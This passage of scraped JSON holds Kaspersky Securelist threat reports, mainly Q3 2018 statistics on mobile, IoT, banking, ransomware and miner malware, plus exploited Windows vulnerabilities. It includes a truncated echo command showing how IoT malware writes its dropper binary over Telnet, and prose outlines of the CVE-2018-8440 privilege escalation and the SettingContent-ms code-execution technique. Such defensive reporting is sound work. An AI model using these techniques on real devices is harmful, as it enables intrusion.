development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "modified": "2019-11-29T10:00:12", "published": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "type": "securelist", "title": "IT threat evolution Q3 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-30T17:13:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. \n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 less packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2,74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1,77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>)..\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n| | \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. \n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. \n \nTelnet | 99,4% \nSSH | 0,6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32. Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1,99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n| | | | | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based 